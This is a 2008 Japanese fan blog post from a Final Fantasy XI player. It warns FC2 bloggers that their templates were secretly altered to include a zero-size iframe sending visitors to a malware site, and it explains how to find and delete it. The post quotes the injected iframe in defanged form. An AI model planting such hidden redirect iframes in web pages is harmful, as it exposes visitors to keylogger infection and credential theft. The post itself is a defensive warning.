FC2ブログ

やりくり母さん from Ramuh

冒険世界ヴァナディールでの、冒険者ミリスのゆる~い生き様(*´∇`*)
2020 09123456789101112131415161718192021222324252627282930312020 11

寝(ようとした)耳に水(追記しました@2008/03/06)

わたしは睡眠時間が少なくても平気な体質なので、普段から宵っ張り。
今日もコアラさん動画の記事を書いた流れで、
そのままネットサーフィンをしていたのです(早く寝ようw)
こう・・・雑談で話がドンドン飛ぶように、色んなサイトを巡って


あ、そういえばそろそろ
FFのバージョンアップ情報とか出ているかしら?



と思いつき、公式サイトに行ったら


感情表現コマンドほか各種更新について (2008/03/04)

の一部w

感情表現コマンド 皆さんからのご要望を受け、
踊り子と同様の踊りを場所を選ばずどのジョブでも踊れるように、
以下の新たな感情表現コマンドを追加します。

  /dance1   /dance2   /dance3   /dance4



踊り子モーション一般開放
キタワァ━━━━━━(n‘∀‘)η━━━━━━ !!!!!




と喜びながら


そうだそうだ。
久々にえふめもさんも見てから寝よう(つ∀-)



などと、眠い目をこすりつつ雑談掲示板を覗いたところ、




ソース>えふめも掲示板 
■ [No.26638] 緊急ウイルス情報(2008-03-05(水) 00:03:37)

ただ今f2cブログで、新たなウイルスが仕掛けられてた模様です。
内容で言うと、ifrem(えふめもで例えるなら、トップに張ってあるPOLバナーみたいなもの)
にウイルスを仕掛けるタイプで、どんなウイルスにも転用可能という恐るべきものです。

ただ・・・何故仕掛けられたか?その経路が未だに不明。
(念のため自分が持ってるf2cブログチェックしましたが、ウイルス無し・・・)
なので、HP持ってる方は、一度自分のHPをチェックした方がいいかもしれません。

因みに、ウイルス対応ソフトではまだの所もあるみたいですので、
最新ウイルス更新があり次第、直ぐにウイルスチェックをした方がいいでしょう~





((((;゚Д゚))))! FC2www





一気に目が覚めた、午前1時頃 ○| ̄|_





ただ、具体的な被害、症状などが「不明」とだけしか書かれていないため
それに関する指摘、質問がかき込まれていましたが、
わたしなりに調べてみたところ、FC2ブログのみ(2008/03/05現在)を狙った
中国系ドメインからの悪行で、実際被害に遭われた
FC2ブロガーさんの報告記事がありました。

FFXI:戦士スキーのブログ >> テンプレートが書き換えられている!
FF11 ペット狩り黒猫奮闘記 >> ウイルス検出について【報告】



拝読したところ、こういう状況みたいです


1:ブログからウイルス検出される。

2:テンプレートを確認すると
 <iframe src=http://www■dda3■net width=0 height=0></iframe>
 という、特定サイトへ自動的にアクセスするように動作する
 身に覚えのないインフラフレームが追加されている。

3:このインフラフレームが仕込まれている居る場合、
 訪問者はそのブログページを見るだけで指定URLへ自動的に誘導される。

4:セキュリティ対策の脆弱なPCの場合、
 キーロガータイプウイルスを送り込まれ感染。
 ID、Passを抜き取られる危険性がある。
 (WindowsUpdate、ウイルス対策ソフトが最新版の場合は、ブロックされます)


まず結論から申し上げると、当ブログで使用しているテンプレート内には
上のような書き換えは無かったのでご安心ください。



正直ホッとしました ・゚・(ノ▽`)・゚・



ただし万全とは言えないため、大変お手間を取らせますが、
念のためWindowsUpdateとウィルスチェックをされることをお奨めします。



そして、今回最も恐いのは



テンプレートが勝手に書き換えられている事



テンプレート編集は、管理画面でしか出来ないのです。
こう・・・どういう手段を講じて
管理ページへ侵入>テンプレート改ざんをしているか?
・・・気味の悪い話です。よって手放しで安心は出来ないので、
パスワード変更とテンプレートの定期チェックをするようにします。



ちなみに、FC2ブログにアカウントをお持ちの方。
以下のことをチェックされることを強く奨めます

・・・でなくてやりましょう!・゚・(ノ▽`)・゚・

チェック方法は以下のとおり
(FFXI:戦士スキーのブログ >> テンプレートが書き換えられている! より引用)


まず、ブログ編集用のページにアクセスします。
そして左側の環境設定というところからテンプレートの編集をクリック

①<iframe を検索
②<iframe src="http://xxxx。xxx。xx" というのが見つかった場合
 その後ろの記述をチェック。
③width=0 height=0 もしくはwidth="0" height="0" という記述だった場合
 限りなく怪しいので、<iframe>~</iframe>までを削除してしまってok!



なお、誤解がないように説明させていただくと
このiframe(インフラフレーム)という構文自体は便利な機能で、
今回はこれを悪用したケースと言うところです。





・・・・(*´∇`*)





誘導URLへのコメントでは飽きたらず
管理ページへの不正アクセスって・・・そこまでやりますか






と脱力する午前4時14分  お休みなさいw ○∠\_



追記:2008/03/06
先日参考にさせていただいたブログ「FF11 ペット狩り黒猫奮闘記」にて
今回の件の対策について情報提供がされていました。
ウイルス検出について【情報追記】

大変参考になる内容ですので、御一読されることを強く奨めします。
ありがとうございました。
R-typeさん>
こんにちは。
今回の件での記事、大変参考になりました。
重ね重ねありがとうございます。
現時点では異変は見られないのでとりあえず安心しています。

ちなみにFireFoxのデザイン崩れは失念していました。
そう言えば以前IEに見切りを付け、
新ブラウザを試していた時のひとつがFireFoxでして・・・

「あ、崩れてるw仕方がない、Sleipnilにしようwww」

と、その時だけは管理人脳でなく閲覧者脳で流してました(殴)
どうしてその時に限って
「あ、これはマズイ!対策しないと」
って考えられなかったのか謎です・・
R-typeさんを始め、
FireFox遣いの皆様申し訳ありません<(_ _)>

追記:2008/03/07
R-typeさんを呼び捨てにしていました
ゴメンナサイ○| ̄|_


調べてみたところ原因は
テンプレートのCSS内でmargin指定が悪さをしているようです。
修正できれば楽勝なのですが、恥ずかしながらわたしもそう言う知識は皆無。

・・・いじったら大変な事になりそうです○∠\_
【許してください】

なのでフレでFireFox遣いがいて、
ちゃんと見られる方が居たら、
捕まえて小一時間問い詰めてみます(殴)


良さそうなアドオンを見つけたので、
問い詰め中止(*´∇`*)
(2008/03/05/21:24追記w)
[ 2008/03/05 19:04 ] [ 編集 ]
お初にお邪魔致します。
こんにちは~戦士スキーのR-typeでございます。

トラックバックを承認しました~
というお知らせに伺ったらなんとこちらのブログがタイトルとサイドバー以外真っ白
変な事件があったあとだけにちょっと慌てましたが、
原因はブラウザがFirefoxだったからのようで
IEでみにきたら正常な表記でした(*´д`*)
私もあまり詳しくはないのでどうやったら治るかはわかりません(´Д`;)

テンプレに関しては現在の物をコピーして保存しておいて
頻繁にそれで上書きしていくという手もあるのかなーとおもってみたり。
そんなめんどくさいことしなくても済むのが一番良いのですが、
業者さんが大人しくなるまではしばらく自衛するしかなさそうですね(´・ω・`)
[ 2008/03/05 15:00 ] [ 編集 ]
コメントの投稿












管理者にだけ表示を許可する
トラックバック
この記事のトラックバックURL

コメント
カテゴリー
月間表示はしておりません
(すごく長くてw)
リンク

プロフィール

millis

Author:millis
 気まぐれに、
 そして、ゆる~く
 しかし時には
 烈火のごとくレベル上げをし、
 でも結局飽きて他の事へ・・・と、
 マイペースに
 生きております(*´∇`*)

Profile
死ぬのがヌンジャの華!(誤解)レベル上げPTから逃げまくる日々(殴)


Profile